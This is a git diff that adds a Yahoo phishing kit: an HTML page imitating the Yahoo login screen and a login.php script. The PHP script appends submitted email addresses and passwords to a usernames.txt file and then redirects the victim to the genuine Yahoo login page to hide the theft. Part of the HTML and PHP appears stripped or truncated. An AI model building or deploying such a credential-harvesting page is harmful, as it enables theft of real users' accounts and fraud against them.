diff --git a/WebPages/yahoo_web/index.html b/WebPages/yahoo_web/index.html new file mode 100644 index 0000000..fb4ca29 --- /dev/null +++ b/WebPages/yahoo_web/index.html @@ -0,0 +1,389 @@ + + + + + Yahoo - login + + + + + + + + + + +
+ + + + Help +
+
+
+ +
+

Yahoo makes it easy to enjoy what matters most in your world.

+

Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of life.

+
+
+
+
+
+
+
+
+ + + + + + + + + \ No newline at end of file diff --git a/WebPages/yahoo_web/login.php b/WebPages/yahoo_web/login.php new file mode 100644 index 0000000..186fd0b --- /dev/null +++ b/WebPages/yahoo_web/login.php @@ -0,0 +1,14 @@ +WELCOME"; +if($myFile != $searchString) { + file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); + header('Location:https://login.yahoo.com'); +} +if($myFile != $searchString) { + echo "LOGIN SUCCESSFULL"; +} +exit(); +?> diff --git a/WebPages/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png b/WebPages/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png new file mode 100644 index 0000000..4c68660 Binary files /dev/null and b/WebPages/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png differ